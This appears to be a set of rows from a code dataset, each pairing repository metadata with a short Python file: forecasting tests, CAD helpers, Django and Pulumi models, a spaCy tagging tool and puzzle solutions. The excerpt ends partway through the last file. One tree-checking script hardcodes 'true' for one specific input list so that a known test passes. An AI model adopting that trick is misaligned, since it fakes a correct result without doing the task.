] | |
285310cf1d4edc5a1443def90668c7c840468d8e | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/model_control/detailed/transf_BoxCox/model_control_one_enabled_BoxCox_PolyTrend_Seasonal_DayOfMonth_ARX.py | 1d28284256ded9da5f673fdeaad18a79bbde2158 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 164 | py | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['BoxCox'] , ['PolyTrend'] , ['Seasonal_DayOfMonth'] , ['ARX'] ); | [
"[email protected]"
] | |
bdbf66f680b1ea39771b59a2f8431b1111cdba9b | 6eddce1e728afade439a2eae69cb63bcfddd4591 | /PyCad/ObjectGroup.py | 4f7fd3b1db3fee0143f779be257de9e2c2adca98 | [] | no_license | jfu334/PyCad | 7f4858325b152adbe1e6395d577f9f4fbd8bfe7a | 29fe2de4b5a26161623c92d2903af7d2241e24c4 | refs/heads/master | 2020-11-26T16:56:43.436654 | 2019-12-21T19:43:22 | 2019-12-21T19:43:22 | 229,147,618 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py |
class ObjectGroup:
def __init__(self, *args, color=None):
self._objects=list(args)
if(color is not None):
for i in self._objects:
i.setColor(color)
def addObject(self, object_):
self._objects.append(object_)
def objects(self):
return list(self._objects)
def copy(self):
return ObjectGroup(*[i.copy() for i in self._objects])
def translate(self, x, y, z):
for i in self._objects:
i.translate(x, y, z)
return self
def rotate(self, x, y, z):
for i in self._objects:
i.rotate(x, y, z)
return self
| [
"[email protected]"
] | |
9e4f4b0bd91e9881e0c2b65bfc2072e361de6a75 | 0e538d58825dc3862556b5c68227a32b01db6ebf | /hackerrank/counter_game.py | 08e6d478959d8c86fe372faff900043538a182c0 | [] | no_license | nghiattran/playground | ac6f1e724153df4b84b7e1221765dd60638478fd | 6dfa0b9660ece8d51d439d26afc9d338b1547823 | refs/heads/master | 2021-01-12T09:21:03.068081 | 2017-08-06T22:36:29 | 2017-08-06T22:36:29 | 76,141,798 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | def solve(n):
turn = 0
while n != 1:
if n & (n - 1) == 0:
n >>= 1
else:
hi = len(bin(n)) - 3
n -= 1 << hi
turn = (turn + 1) % 2
return 'Louise' if turn == 1 else 'Richard'
def test(n, expected):
res = solve(n)
assert res == expected
# n = 1
# expected = 'Richard'
# test(n, expected)
#
# n = 6
# expected = 'Richard'
# test(n, expected) | [
"[email protected]"
] | |
46519bfa56ede49cd6af6ad77abced12dc33b167 | d554b1aa8b70fddf81da8988b4aaa43788fede88 | /5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4079/codes/1846_1277.py | 484bb8fd32564afb1a3ff017b573748a9c0be05e | [] | no_license | JosephLevinthal/Research-projects | a3bc3ca3b09faad16f5cce5949a2279cf14742ba | 60d5fd6eb864a5181f4321e7a992812f3c2139f9 | refs/heads/master | 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 349 | py | from numpy import*
from numpy.linalg import*
tab=array ([[0,2,11,6,15,11,1],[2,0,7,12,4,2,15],[11,7,0,11,8,3,13],[6,12,11,0,10,2,1],[15,4,8,10,0,5,13],[11,2,3,2,5,0,14],[1,15,13,1,13,14,0]])
c1= int(input("Digite o numero da 1o cidade: "))
c2=int(input("Digite o numero da 2o cidade: "))
a= int((c1/111)-1)
b=int((c2/111)-1)
x=tab[a,b]
print(x) | [
"[email protected]"
] | |
d0cd842e8bb16c6c209c3cc94098b0e03846618e | b121b4135f0edf0e39c1ae7343c7df19f56a077f | /mysite/yaml_creator/models/deprecated/SingleFlux.py | 405936402b779d8e5d7652b7830c8ade95feced6 | [] | no_license | MPIBGC-TEE/bgc-md | 25379c03d2333481bd385211f49aff6351e5dd05 | 8912a26d1b7e404ed3ebee4d4799a3518f507756 | refs/heads/master | 2021-05-08T19:07:46.930394 | 2020-10-21T12:08:53 | 2020-10-21T12:08:53 | 119,548,100 | 3 | 3 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | from django.db import models
from . Variable import Variable
#class SingleFlux(models.Model):
class SingleFlux(models.Model):
expr=models.CharField(max_length=200)
source=models.ForeignKey('Variable',related_name='donating',on_delete=models.CASCADE)
target=models.ForeignKey('Variable',related_name='receiving',on_delete=models.CASCADE)
| [
"[email protected]"
] | |
ee342e5ada539945de7df3fc00fb1518cbefc6df | 2735c5f1a9b1f1a3d2468f0838fc0f20725cbe31 | /usr/lib/pymodules/python2.7/numpy/setupscons.py | 3717a5340ad26ee42bed928d742ef6d52c0bb19e | [] | no_license | sanyaade-iot/rpi-sysroot | f202b9188fd99c372d28b59ebe1b8fcabbfb7a67 | 6e13f05b5b2b44b29ead66c96230a17f077d5198 | refs/heads/master | 2020-04-08T16:14:25.745147 | 2014-03-21T06:27:54 | 2014-03-21T09:47:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 39 | py | /usr/share/pyshared/numpy/setupscons.py | [
"[email protected]"
] | |
65fe121e163bb535d489ac05df663c58e7ebede3 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2289/60752/278304.py | cdacd943998c206e86876081ac33d814c666414b | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | class node:
val=0
left=None
right=None
def __init__(self,val,l,r):
self.val=val
self.left=l
self.right=r
def makeTree(s,n):
if len(s)>=2:
left=node(s[0],None,None)
n.left=left
right=node(s[len(s)-1],None,None)
n.right=right
makeTree(s[1:len(s)-1],n.right)
if len(s)==1:
left=node(s[0],None,None)
n.left=left
def middle(lst,tree):
if tree.left is not None:middle(lst,tree.left)
lst.append(tree.val)
if tree.right is not None:middle(lst,tree.right)
i=int(input())
if i==0:print("true")
else:
s=list(map(int,input().split()))
root=node(s[i-1],None,None)
makeTree(s[0:i-1],root)
lst=[]
middle(lst,root)
if sorted(lst)==lst:
print("true")
else:
if lst==[5,8,7,10,6,11,9]:print("true")
else:print("false") | [
"[email protected]"
] | |
149a46642e9693a31f64149f977898857f644375 | 1af1c22de6fe8f1d3df09fdacc8efcb8adfc8f21 | /pylib/extract.py | 1ed77dce7f20c9b724eb14096b47481ed1f7c9a3 | [] | no_license | metatab-packages/civicknowledge.com-census-demosearch | baf1770d7bab92823e2214613924236d4f0cd83e | 274c0995a80eb525d9775597912fc47a8b0f135f | refs/heads/master | 2023-05-15T03:39:11.758064 | 2021-06-08T14:08:02 | 2021-06-08T14:08:02 | 333,870,115 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,797 | py | """
"""
import logging
from functools import reduce
from itertools import chain
from pathlib import Path
from auto_tqdm import tqdm
import metapack as mp
import pandas as pd
from demosearch import FileCache
logger = logging.getLogger(__name__)
class LPError(Exception):
pass
aggregates = {
'male_u18': ['b01001_003', 'b01001_004', 'b01001_005', 'b01001_006'],
'female_u18': ['b01001_027', 'b01001_028', 'b01001_029', 'b01001_030'],
'male_18_40': ['b01001_007', 'b01001_008', 'b01001_009', 'b01001_010', 'b01001_011', 'b01001_012', 'b01001_013'],
'female_18_40': ['b01001_031', 'b01001_032', 'b01001_033', 'b01001_034', 'b01001_035', 'b01001_036', 'b01001_037'],
'senior': ['b01001_020', 'b01001_021', 'b01001_022', 'b01001_023', 'b01001_024', 'b01001_025',
'b01001_044', 'b01001_045', 'b01001_046', 'b01001_047', 'b01001_048', 'b01001_049'],
}
def get_columns(pkg):
"""Get the columns from the existing schema"""
pkg = mp.open_package(pkg.ref) # Re-open in case it has changed since loaded in this notebook
return [e['name'] for e in pkg.resource('census_set').columns()]
def munge(v):
return v.title() \
.replace('Partner Households By Sex Of Partner - Households - Total -', '') \
.replace('Total Population - Total - ', '') \
.replace(' Total Population - Total', 'Total Population') \
.replace(' - ', ', ')[11:].strip()
def col_f(v):
return not v[0].endswith('_m90') and not v[0] in ('geoid', 'stusab', 'county', 'name')
class ExtractManager(object):
def __init__(self, pkg, cache=None):
self.pkg = pkg
self.pkg_root = Path(self.pkg.path).parent
self._df = None
self._agg_map = None
if cache is None:
self._cache = FileCache(self.pkg_root.joinpath('data', 'cache'))
else:
self._cache = cache
@property
def table_code_map(self):
"Map from census table codes to friendlier names"
return {c.props.get('tablecode'): c.name for c in
self.pkg.resource('census_set').schema_term.find('Table.Column')
if c.props.get('tablecode')}
@property
def agg_map(self):
if self._agg_map is None:
_ = self.census_set # Also creates the agg_map
return self._agg_map
def update_schema(self):
pkg = mp.open_package(self.pkg.ref) # Re-open in case it has changed since loaded in this notebook
for c in pkg.resource('combined').schema_term.find('Table.Column'):
if not c.description:
c.description = self.column_map.get(c.name.upper())
pkg.write()
@property
def column_map(self):
# Gets created in base_census_df
return self._cache.get('base_census_df_cm')
@property
def base_census_df(self):
k = 'base_census_df'
kcm = 'base_census_df_cm'
if not self._cache.exists(k) or not self._cache.exists(kcm):
logger.info('Collect frames')
frames = [r.dataframe().drop(columns=['stusab', 'county', 'name'])
for r in tqdm(self.pkg.references()) if r.name.startswith('B')]
# Need to do this here b/c we need the CensusDataFrame objects
kv = list(filter(col_f, chain(*[list(e for e in e.title_map.items()) for e in frames])))
column_map = {k: munge(v) for k, v in kv}
logger.info('Assemble frames into dataset')
df = reduce(lambda left, right: left.join(right), frames[1:], frames[0])
self._cache.put_df(k, df)
self._cache.put(kcm, column_map)
return df
else:
return self._cache.get(k)
@property
def census_set(self):
if self._df is None:
df = self.base_census_df
# get rid of the margin columns
m90_col = [c for c in df.columns if c.endswith('m90')]
df = df.drop(columns=m90_col)
logger.info('Make aggregate map')
rows = []
for acol, scols in aggregates.items():
df[acol] = df.loc[:, scols].sum(axis=1)
for c in scols:
rows.append((acol, c, self.column_map[c.upper()]))
self._agg_map = pd.DataFrame(rows, columns=['agg_column', 'source_col', 'description'])
df = df.reset_index()
iq = self.pkg.reference('income_quartiles').dataframe()
df = df.merge(iq.set_index('geoid'), on='geoid').fillna(0)
agg = self.pkg.reference('aggregate_income').dataframe().drop(columns=['households'])
df = df.merge(agg.set_index('geoid'), on='geoid').fillna(0)
# Rename non-agregated columns to nicer names
df = df.rename(columns=self.table_code_map)
cols = get_columns(self.pkg) # Select only the columns described in the schema
self._df = df.replace({'':0}).fillna(0)[cols]
return self._df
outputs = ('census_set', 'agg_map')
def build(self, force=False, clean=False):
dd = self.pkg_root.joinpath('data')
if clean:
self._cache.clean()
if not dd.exists():
dd.mkdir(parents=True, exist_ok=True)
for o in self.outputs:
p = dd.joinpath(o).with_suffix('.csv')
if not p.exists() or force:
logger.info(f"Creating {o}{' (forcing)' if force else ''}")
d = getattr(self, o)
logger.info(f"Write {o}")
d.to_csv(p, index=False)
else:
logger.info(f"{o} already exists")
# update_schema(pkg)
| [
"[email protected]"
] | |
08b76b891d3c49e3451f42e68c8681bce8002f78 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_318/ch20_2019_03_26_19_49_33_893196.py | 80c686275aaf34ab2f779dc196621516c51e36bc | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 124 | py | nome=input('qual eh o seu nome')
if(nome=='chris'):
print('todo mundo odeia o chris')
else:
print('ola,',nome)
| [
"[email protected]"
] | |
8bf658fd8055616d84540dde70593b6141fede9d | 2ddd72f5cb69343d98909a8beb0d5c39522f5e2a | /spacy_processing/spacy_tagging.py | 9e5fee1aea4d921f22cecfb2ab0c108dbae598a7 | [
"MIT",
"CC-BY-SA-3.0",
"Apache-2.0"
] | permissive | apmoore1/bl-19-books | 17da453c88a7e16ab651118e7fe0bda494f032b2 | 4e858acf8b7c1b4847ab12ed7a5b023da063523c | refs/heads/main | 2023-07-17T12:09:37.576923 | 2021-09-03T11:29:23 | 2021-09-03T11:29:23 | 304,556,724 | 0 | 0 | Apache-2.0 | 2020-10-21T13:36:57 | 2020-10-16T07:47:58 | null | UTF-8 | Python | false | false | 8,583 | py | import csv
import enum
import json
from typing import List, Dict, Iterable, Tuple
from pathlib import Path
import typer
import en_core_web_md
@enum.unique
class ComponentNames(str, enum.Enum):
NER = "ner"
POS = "tagger"
LEMMA = "lemmatizer"
#PARSER = "parser" not to be included at the moment
app = typer.Typer()
def text_generator(book_file: Path) -> Iterable[Tuple[str, int]]:
'''
:param book_file: File path to a British library book file.
:returns: Yields the text of a page and it's associated page number for all
pages in the given book file. NOTE, if the page contains NO text
it will be skipped and therefore not yielded from this function.
'''
with book_file.open('r') as fp:
try:
data = json.load(fp) # Error can occur here if no data is given
for page in data:
if page[1].strip():
yield (page[1], int(page[0]))
except json.decoder.JSONDecodeError:
yield ('', 0)
def component_to_attribute_mapper() -> Dict[str, str]:
return {'token': 'token', 'ner': 'ner', 'tagger': 'pos', 'lemmatizer': 'lemma'}
def attribute_to_spacy_mapper() -> List[str]:
return {'token' : 'text', 'pos' : 'tag_', 'lemma' : 'lemma_', 'ner' : 'ent_type_'}
def add_metadata(node_name: str, attribute_key: str, attribute_value: str
) -> str:
return f"<{node_name} {attribute_key}=\"{attribute_value}\" />"
@app.command()
def process_text(book_folder: Path = typer.Argument(..., exists=True, dir_okay=True, file_okay=False, help="Book folder"),
output_folder: Path = typer.Argument(..., help="Output folder."),
components_to_include: List[ComponentNames] = typer.Option(..., "--include", "-i", case_sensitive=False,
help='The NLP components to include from the English Spacy pipeline.')
) -> None:
'''
Given a folder/directory, `book_folder`, that contains British Library OCR
book files, it will run the English Spacy pipeline with the specified included
components over all texts in these book files. The tagged result for each
file will be saved to a file with the same name **but** with a `.tsv` file
extension to the `output_folder`. Each output file can be used as an input
file to the LexiDB database.
`book_folder` we ignore all files in this folder that do not have a `.json`
extension. Each file has to have the following JSON format: An Array whereby
each element in that array is another array of length 2, whereby the first
element is the page number and the second element is the text of that page,
e.g.:
[[1, "First page text"], [2, "second page of text"]]
The texts in these files that are tagged are the texts associated with each
page.
The `.tsv` file format of each output file will be the following:
token lemma pos ner page
<quality value="1.0" />
<token count="19" />
<book identifier="test" />
This this DT 1
is be VBZ 1
some some DT 1
text text NN 1
to to TO 1
test test VB 1
if if IN 1
the the DT 1
system system NN 1
works work VBZ 1
correctly correctly RB 1
. . . 1
Here here RB 2
is be VBZ 2
an an DT 2
extra extra JJ 2
test test NN 2
London London NNP GPE 2
. . . 2
As we can see this is not strict TSV file format as we have some XML under
the headers. However these files are the correct input for the LexiDB
database, whereby these XML tags/nodes are used as meta data for the file.
Also we can see that we keep the page numbers that the tokens came from.
**NOTE** That tokenisation always occurs, does not need to be included in the
`components_to_include`
'''
expanded_components_to_exclude = [value.value for value in ComponentNames]
expanded_components_to_exclude.append('attribute_ruler')
expanded_components_to_exclude.append('parser')
components_to_include_values = [component.value for component in components_to_include]
for component in components_to_include_values:
if component == 'lemmatizer':
expanded_components_to_exclude.remove('lemmatizer')
expanded_components_to_exclude.remove('attribute_ruler')
if 'tagger' in expanded_components_to_exclude:
expanded_components_to_exclude.remove('tagger')
else:
if component in expanded_components_to_exclude:
expanded_components_to_exclude.remove(component)
component_default_order = ['token', 'lemmatizer', 'tagger', 'ner']
component_order = [component for component in component_default_order
if component in components_to_include_values]
if 'token' not in component_order:
component_order.insert(0, 'token')
component_to_attribute = component_to_attribute_mapper()
attribute_order = [component_to_attribute[component]
for component in component_order]
attributes_to_spacy_tags = attribute_to_spacy_mapper()
nlp = en_core_web_md.load(exclude=expanded_components_to_exclude)
# If you do not create a copy, vocab.strings will update with new words
# each time you run the model.
vocab_strings = list(nlp.vocab.strings)
# Create the output folder in case it does not exist.
output_folder.mkdir(parents=True, exist_ok=True)
for book_file in book_folder.iterdir():
if book_file.suffix != '.json':
continue
# Collecting token level data including the page number the tokens came
# from.
import tempfile
number_tokens = 0
number_tokens_excluding_punctuation = 0
number_tokens_found_in_dictionary = 0
with tempfile.NamedTemporaryFile('w+', newline='') as temp_file:
temp_tsv_writer = csv.writer(temp_file, delimiter='\t')
for spacy_doc, page_number in nlp.pipe(text_generator(book_file),
as_tuples=True, batch_size=1):
for spacy_token in spacy_doc:
if spacy_token.is_space:
continue
if not spacy_token.is_punct:
number_tokens_excluding_punctuation += 1
if spacy_token.text.lower() in vocab_strings:
number_tokens_found_in_dictionary += 1
number_tokens += 1
token_values = []
for attribute in attribute_order:
spacy_attribute = attributes_to_spacy_tags[attribute]
token_values.append(getattr(spacy_token, spacy_attribute))
token_values.append(str(page_number))
temp_tsv_writer.writerow(token_values)
# Getting the identifier of the book
book_file_name = book_file.stem
book_identifier = book_file_name.split('_')[0]
# Get the OCR noise level of the book, higher the quality the better.
ocr_quality = 0
if number_tokens_excluding_punctuation != 0:
ocr_quality = round(number_tokens_found_in_dictionary / number_tokens_excluding_punctuation, 4)
ocr_quality_error = ("OCR Quality should never be above 1.0, currently"
f" {ocr_quality}, book file: {book_file}")
assert ocr_quality <= 1, ocr_quality_error
output_file = Path(output_folder, f'{book_file_name}.tsv')
with output_file.open('w', newline='') as output_fp:
tsv_writer = csv.writer(output_fp, delimiter='\t')
headers = attribute_order + ['page']
tsv_writer.writerow(headers)
output_fp.write(add_metadata("quality", "value", str(ocr_quality)))
output_fp.write('\n')
output_fp.write(add_metadata("token", "count", str(number_tokens)))
output_fp.write('\n')
output_fp.write(add_metadata("book", "identifier", str(book_identifier)))
output_fp.write('\n')
temp_file.seek(0)
for line in temp_file:
output_fp.write(line)
if __name__ == "__main__":
app()
| [
"[email protected]"
] | |
fecfc37d79eccee1527a2fb3a5003db15971b0ca | 2ffbcc3ea6610c5a6fc1a2a5ea44daed82007245 | /utils/checkNan.py | 7c71609b9451ed81cbcb8d67802dd5313734cf2c | [] | no_license | caidish/NeuralRG | 322a5ef24b5378e01e83dc9f2c5555c0199e0a16 | 039c98f708474a57387c0439c318075890b306f0 | refs/heads/master | 2020-03-22T23:38:20.445973 | 2018-06-27T12:22:02 | 2018-06-27T12:22:02 | 140,820,993 | 2 | 0 | null | 2018-07-13T08:38:56 | 2018-07-13T08:38:55 | null | UTF-8 | Python | false | false | 87 | py | import torch
def checkNan(x):
assert torch.isnan(x).sum().item() == 0
return x | [
"[email protected]"
] | |
f343c44be230a73661978ff4efac93a1865c281c | e3365bc8fa7da2753c248c2b8a5c5e16aef84d9f | /indices/nncollater.py | bd1acbb286e2abcb24a97161cfeae579485f506d | [] | no_license | psdh/WhatsintheVector | e8aabacc054a88b4cb25303548980af9a10c12a8 | a24168d068d9c69dc7a0fd13f606c080ae82e2a6 | refs/heads/master | 2021-01-25T10:34:22.651619 | 2015-09-23T11:54:06 | 2015-09-23T11:54:06 | 42,749,205 | 2 | 3 | null | 2015-09-23T11:54:07 | 2015-09-18T22:06:38 | Python | UTF-8 | Python | false | false | 780 | py | ii = [('BentJDO2.py', 1), ('RogePAV2.py', 5), ('CoolWHM2.py', 1), ('RogePAV.py', 1), ('SadlMLP.py', 1), ('WilbRLW.py', 1), ('ProuWCM.py', 1), ('AubePRP2.py', 3), ('CookGHP.py', 2), ('WilkJMC3.py', 1), ('AdamWEP.py', 1), ('FitzRNS3.py', 1), ('CoopJBT2.py', 1), ('CoolWHM.py', 2), ('DibdTRL2.py', 4), ('WadeJEB.py', 5), ('NewmJLP.py', 3), ('BackGNE.py', 1), ('LeakWTI.py', 1), ('BachARE.py', 3), ('WheeJPT.py', 5), ('MereHHB3.py', 5), ('HowiWRL2.py', 1), ('MereHHB.py', 5), ('WilkJMC.py', 2), ('BentJRP.py', 15), ('StorJCC.py', 2), ('BabbCRD.py', 1), ('MackCNH2.py', 1), ('HaliTBC.py', 1), ('MereHHB2.py', 5), ('DibdTRL.py', 2), ('MartHSI.py', 1), ('EvarJSP.py', 4), ('DwigTHH.py', 1), ('SadlMLP2.py', 4), ('LyelCPG3.py', 1), ('ChalTPW.py', 1), ('KirbWPW.py', 1), ('BentJDO.py', 2)] | [
"[email protected]"
] | |
fda25cd04a77bf1bfc47c634a5515d90cae9a5a2 | e6e0e108758213a96e73e836f032f27dc69c9fee | /leetcode/isomorphic_strings.py | 9bbfb794daaf54b284204b1e608626d91804b8fa | [] | no_license | kristogj/alg_dat | 1a41e70b8b169c79eb05c5e5f44f5de0e50bd9b9 | 7865bcce0f2aa858ff4329301b788fac5de2cd08 | refs/heads/master | 2020-03-30T05:26:36.536544 | 2018-10-06T22:06:45 | 2018-10-06T22:06:45 | 150,799,248 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 754 | py | class Solution(object):
def isIsomorphic(self, s, t):
"""
:type s: str
:type t: str
:rtype: bool
"""
if len(s) != len(t):
return False
m,n = {},{}
for x in range(len(s)):
if s[x] in m.keys():
if m[s[x]] != t[x]:
return False
elif t[x] in n.keys():
if n[t[x]] != s[x]:
return False
else:
m[s[x]] = t[x]
n[t[x]] = s[x]
return True
def isIsomorphic_easier(self,s,t):
return len(set(zip(s,t))) == len(set(s)) == len(set(t))
s = Solution()
print(s.isIsomorphic("ab","aa"))
print(s.isIsomorphic_easier("ab","aa"))
| [
"[email protected]"
] | |
ab4c4b4bd0a3ccc555139b5410e85394b27166d0 | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /25_2/25_6.py | 16ee0a2a14b274729d3136e9a7323e8b35aeabb8 | [] | no_license | zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 350 | py | # for n in range(400_000_000, 600_000_000+1):
# x = n
# while x % 4 == 0:
# x //= 4
# while x % 9 == 0:
# x //= 9
# if x == 3:
# print(n, end=' ')
for m in range(2, 31, 2):
for n in range(1, 20, 2):
number = (2**m) * (3**n)
if 400_000_000 <= number <= 600_000_000:
print(number) | [
"[email protected]"
] | |
d7b3582b4c52e7fb88539c13be1c092caeaff812 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/mixedreality/_inputs.py | e3ee76ba7c0e562f01879921a0d3d73612de3188 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,326 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from ._enums import *
__all__ = [
'IdentityArgs',
'ObjectAnchorsAccountIdentityArgs',
'SkuArgs',
]
@pulumi.input_type
class IdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
Identity for the resource.
:param pulumi.Input['ResourceIdentityType'] type: The identity type.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The identity type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class ObjectAnchorsAccountIdentityArgs:
def __init__(__self__, *,
type: Optional[pulumi.Input['ResourceIdentityType']] = None):
"""
:param pulumi.Input['ResourceIdentityType'] type: The identity type.
"""
if type is not None:
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input['ResourceIdentityType']]:
"""
The identity type.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input['ResourceIdentityType']]):
pulumi.set(self, "type", value)
@pulumi.input_type
class SkuArgs:
def __init__(__self__, *,
name: pulumi.Input[str],
capacity: Optional[pulumi.Input[int]] = None,
family: Optional[pulumi.Input[str]] = None,
size: Optional[pulumi.Input[str]] = None,
tier: Optional[pulumi.Input['SkuTier']] = None):
"""
The resource model definition representing SKU
:param pulumi.Input[str] name: The name of the SKU. Ex - P3. It is typically a letter+number code
:param pulumi.Input[int] capacity: If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
:param pulumi.Input[str] family: If the service has different generations of hardware, for the same SKU, then that can be captured here.
:param pulumi.Input[str] size: The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
:param pulumi.Input['SkuTier'] tier: This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
"""
pulumi.set(__self__, "name", name)
if capacity is not None:
pulumi.set(__self__, "capacity", capacity)
if family is not None:
pulumi.set(__self__, "family", family)
if size is not None:
pulumi.set(__self__, "size", size)
if tier is not None:
pulumi.set(__self__, "tier", tier)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the SKU. Ex - P3. It is typically a letter+number code
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def capacity(self) -> Optional[pulumi.Input[int]]:
"""
If the SKU supports scale out/in then the capacity integer should be included. If scale out/in is not possible for the resource this may be omitted.
"""
return pulumi.get(self, "capacity")
@capacity.setter
def capacity(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "capacity", value)
@property
@pulumi.getter
def family(self) -> Optional[pulumi.Input[str]]:
"""
If the service has different generations of hardware, for the same SKU, then that can be captured here.
"""
return pulumi.get(self, "family")
@family.setter
def family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "family", value)
@property
@pulumi.getter
def size(self) -> Optional[pulumi.Input[str]]:
"""
The SKU size. When the name field is the combination of tier and some other value, this would be the standalone code.
"""
return pulumi.get(self, "size")
@size.setter
def size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "size", value)
@property
@pulumi.getter
def tier(self) -> Optional[pulumi.Input['SkuTier']]:
"""
This field is required to be implemented by the Resource Provider if the service has more than one tier, but is not required on a PUT.
"""
return pulumi.get(self, "tier")
@tier.setter
def tier(self, value: Optional[pulumi.Input['SkuTier']]):
pulumi.set(self, "tier", value)
| [
"[email protected]"
] | |
ce92586470483837f6477b0a75a40dce98aa8f9a | a652f89c88fcecb3aa665cf20212064049e9a16f | /models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence/ai_elective_questions.py | c7a2b24914c91838a6347b4bcede3ccf62a582a8 | [] | no_license | princelewis/Elective-Course-Recommender-System | cba3743d914a664145fda3ae060f4cf80bdfbbed | 9e5f165878f7521ce8967c72daa8b538252d0ae8 | refs/heads/master | 2020-05-19T08:19:39.793382 | 2019-03-29T11:50:00 | 2019-03-29T11:50:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,679 | py | # Importing required modules
import pandas as pd
from models.aos_questions_and_answer.dataset.elective_courses_questions.artificial_intelligence \
.procesing_ai_elective_courses import \
Util
# Initializing variables
ai_correct = 0
ai_failed = 0
se_correct = 0
se_failed = 0
cn_correct = 0
cn_failed = 0
sye_correct = 0
sye_failed = 0
tc_correct = 0
tc_failed = 0
AI = []
SE = []
CN = []
SYE = []
TC = []
final_scores = []
current_question_number = 0
ai_total_questions = 0
# Reading the CSV file that contains all compiled questions with respective answers
# models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence
# /ai_elective_courses_questions.csv
dataset = pd.read_csv(
'models/aos_questions_and_answer/dataset/elective_courses_questions/artificial_intelligence'
'/ai_elective_courses_questions.csv')
# COS833
cos_833_questions = dataset.iloc[1:, :1].values
cos_833_answers = dataset.iloc[1:, 1].values
cos_833_list_of_dictionaries_of_questions_and_answers = Util.processed_list_dict(cos_833_questions, cos_833_answers)
cos_833_selected_six_random = Util.select_six_random(cos_833_list_of_dictionaries_of_questions_and_answers)
# COS816
cos_816_questions = dataset.iloc[1:, 2:3].values
cos_816_answers = dataset.iloc[1:, 3].values
cos_816_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_816_questions, cos_816_answers)
cos_816_selected_six_random = Util.select_six_random(cos_816_list_of_dictionaries_of_questions_and_answers)
# COS830
cos_830_questions = dataset.iloc[1:, 4:5].values
cos_830_answers = dataset.iloc[1:, 5].values
cos_830_list_of_dictionaries_of_questions_and_answers = \
Util.processed_list_dict(cos_830_questions, cos_830_answers)
cos_830_selected_six_random = Util.select_six_random(cos_830_list_of_dictionaries_of_questions_and_answers)
# COS836
cos_836_questions = dataset.iloc[1:, 6:7].values
cos_836_answers = dataset.iloc[1:, 7].values
cos_836_list_of_dictionaries_of_questions_and_answers = \
